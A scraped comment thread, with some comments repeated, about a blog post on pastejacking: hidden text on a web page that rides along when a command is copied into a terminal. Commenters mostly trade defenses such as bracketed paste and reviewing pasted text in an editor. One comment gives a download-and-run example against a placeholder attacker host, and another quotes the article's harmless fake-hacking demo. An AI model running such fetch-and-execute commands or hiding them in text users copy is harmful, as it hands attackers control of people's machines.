Look before you paste from a website to terminal(lifepluslinux.blogspot.com)
lifepluslinux.blogspot.com
Look before you paste from a website to terminal
http://lifepluslinux.blogspot.com/2017/01/look-before-you-paste-from-website-to.html
43 comments
Not sure if this is iTerm2 or zsh, but I have to confirm the code I am pasting by pressing enter, which gives me an opportunity to review it first. I like this feature a lot.
That's a feature of iTerm2, it try to warn you about convert characters etc.
There is safe-paste plugin for oh-my-zsh and you can enable the bracketed paste mode in Bash too by adding set enable-bracketed-paste on to your ~/.inputrc. https://cirw.in/blog/bracketed-paste
Others have said it's a feature of iTerm2 (which I don't know about), but it's also a feature of zsh. I use KTerm and it definitely didn't do this with bash, but it does it with zsh.
[deleted]
Not always, sometimes when I copy something and paste it with Ctrl+V (insted of Ctrl+Shift+V) it still get pasted+entered.
Found another one here: http://thejh.net/misc/website-terminal-copy-paste
Here's a question, could such an exploit be achieved using something like Stack Overflow?
Probably not due to the limited markup options available.
It would almost certainly be possible form a great many similar forums and bulletin-board like sites though.
It would almost certainly be possible form a great many similar forums and bulletin-board like sites though.
Could you get away with a more limited version by abusing Unicode?
With so many "unprintables" combined with things like the RTL and LTR control characters I think it would be possible on some level.
With so many "unprintables" combined with things like the RTL and LTR control characters I think it would be possible on some level.
Yes. If you have multiline code, you can just add whitespace to the first line and it will appear outside of the code element. At least OS X, you cannot see a scroll bar.
Depends on the markup extensions, but other websites that allows embedded notes could be also a attack vector.
[deleted]
Good question. How much markup do they allow?
Probably worthless tip, try browsing that code snippet with a screen reader. Yes, it is not hidden from that software. :-)
I feel that we are not exactly the target audience for this kind of tip. Linux forums are full of code snippets that people blindly copy and paste so this is clearly an extended behavior
In any case, most newbies wouldn't even understand whether a command is malicious or not (e.g. `wget http://hax0r.com/exploit.sh; bash exploit.sh`), but I wouldn't say the tip is worthless...
In any case, most newbies wouldn't even understand whether a command is malicious or not (e.g. `wget http://hax0r.com/exploit.sh; bash exploit.sh`), but I wouldn't say the tip is worthless...
or you could just copy the code-snippet by placing the mouse next to character 'l' of 'ls' and mark it with shift+right arrow key.
Each selected character and of course white space gets highlighted. When you highlighted the white space next to 'ls' on the right next highlighted character should be '-' but i keeps on marking seemingly forever. If you paste that you'll see that every single character of 'invisible' code gets marked.
Each selected character and of course white space gets highlighted. When you highlighted the white space next to 'ls' on the right next highlighted character should be '-' but i keeps on marking seemingly forever. If you paste that you'll see that every single character of 'invisible' code gets marked.
Browser reader modes reveal it, too.
This sort of attack has been discussed in great detail previously:
https://news.ycombinator.com/item?id=10554679
https://news.ycombinator.com/item?id=5508225
http://thejh.net/misc/website-terminal-copy-paste
https://news.ycombinator.com/item?id=10554679
https://news.ycombinator.com/item?id=5508225
http://thejh.net/misc/website-terminal-copy-paste
this should be explited by stack overflow to have a counter on which lines were copied and how many times. With this counter one could know what's the best answer used by many :)
The "fix" to this problem is not to let your browser hook Ctrl+C. Mozilla, if you're listening, could you perhaps make this an option? Or perhaps display a notice if you notice JS hook on Ctrl+C?
The example in the article doesn't use javascript, and doesn't hook Ctrl-C, all it uses is simple css.
The problem here is not related to the browsers at all, the problem is on the terminal side, which should not immediately run and random text that was pasted, but should allow editing the pasted text before running.
The problem here is not related to the browsers at all, the problem is on the terminal side, which should not immediately run and random text that was pasted, but should allow editing the pasted text before running.
I am not sure the browser is free of blame here, getting invisible characters copied together with the text I selected goes completely against my expectations.
this could be considered a handy feature in a different scenario, the browser shouldn't be responsible for checking if the text you copied was visible.
Just get a half decent terminal, many have precautions in place for copy/paste.
Just get a half decent terminal, many have precautions in place for copy/paste.
On zsh I had to press enter manually after pasting the code, before I pasted it I could see 4 lines of code.
Just don't let terminals auto-accept pasted code, require user interaction. That is attack on user from clipboard generally, not from browser on terminal, so why browsers should protect clipboards?
Just don't let terminals auto-accept pasted code, require user interaction. That is attack on user from clipboard generally, not from browser on terminal, so why browsers should protect clipboards?
There is no Javascript involved here.
Pfff should have just put forkbomb there.
I already paste everything longer than a single line to my non-terminal text editor (e.g. sublime) before I paste it to my terminal or vim. Perhaps I should start doing this for everything.
Has anyone been burned by this? I'm going to start pasting things into a different text editor before running them.
That's my go-to method. I use Notepad++ with "View -> Show Symbol -> Show All Characters" turned on.
Bracketed paste and a vaguely half-decent terminal emulator will prevent this.
What I usually do since I've been shown this kind of attack :
- Ctrl-X Ctrl-E: open the default text editor on your system
- paste your snipet here and review it
- save the snipet in your editor, it is now run.
- Ctrl-X Ctrl-E: open the default text editor on your system
- paste your snipet here and review it
- save the snipet in your editor, it is now run.
This is a valid danger but the author goes a bit far with the sudo warning. Unless you're logged in as root to most systems (in which case sudo likely won't be needed to screw your system up) using sudo would result in a password being requested which, I would hope, the user would see as a red flag, especially if they are technical enough to be locating and testing script snippets.
In zsh I can paste (or paste) into the browser (FF) I get
ls ; clear; echo 'Haha! You gave me access to your computer with sudo!'; echo -ne 'h4cking ## (10%)\r'; sleep 0.3; echo -ne 'h4cking ### (20%)\r'; sleep 0.3; echo -ne 'h4cking ##### (33%)\r'; sleep 0.3; echo -ne 'h4cking ####### (40%)\r'; sleep 0.3; echo -ne 'h4cking ########## (50%)\r'; sleep 0.3; echo -ne 'h4cking ############# (66%)\r'; sleep 0.3; echo -ne 'h4cking ##################### (99%)\r'; sleep 0.3; echo -ne 'h4cking ####################### (100%)\r'; echo -ne '\n'; echo 'Hacking complete.'; echo 'Use GUI interface using visual basic to track my IP' ls -lat
Which seems like it would be pretty stupid for me to press enter. Which if we're talking security it seems to more sane thing to do is not automatically send commands that are pasted in. Zsh being secure and bash not. I feel this is more a developer issue than user.
ls ; clear; echo 'Haha! You gave me access to your computer with sudo!'; echo -ne 'h4cking ## (10%)\r'; sleep 0.3; echo -ne 'h4cking ### (20%)\r'; sleep 0.3; echo -ne 'h4cking ##### (33%)\r'; sleep 0.3; echo -ne 'h4cking ####### (40%)\r'; sleep 0.3; echo -ne 'h4cking ########## (50%)\r'; sleep 0.3; echo -ne 'h4cking ############# (66%)\r'; sleep 0.3; echo -ne 'h4cking ##################### (99%)\r'; sleep 0.3; echo -ne 'h4cking ####################### (100%)\r'; echo -ne '\n'; echo 'Hacking complete.'; echo 'Use GUI interface using visual basic to track my IP' ls -lat
Which seems like it would be pretty stupid for me to press enter. Which if we're talking security it seems to more sane thing to do is not automatically send commands that are pasted in. Zsh being secure and bash not. I feel this is more a developer issue than user.
> Which seems like it would be pretty stupid for me to press enter. Which if we're talking security it seems to more sane thing to do is not automatically send commands that are pasted in. Zsh being secure and bash not. I feel this is more a developer issue than user.
A triple click selection will copy the whole line including the newline. So a paste will execute it as well.
A triple click selection will copy the whole line including the newline. So a paste will execute it as well.
It would be better if it was a curl piped to bash. Also, I'd love it if there was a curl at the beginning of this to track stats on how many people run it.
Although I suspect the stats would be poisoned by people doing forensics.
Edit: also, I wonder how many things it would break if browser changed copy to only copy visible text.
Although I suspect the stats would be poisoned by people doing forensics.
Edit: also, I wonder how many things it would break if browser changed copy to only copy visible text.
zsh implements something called bracketed paste mode.[1]
[1] - https://cirw.in/blog/bracketed-paste
[1] - https://cirw.in/blog/bracketed-paste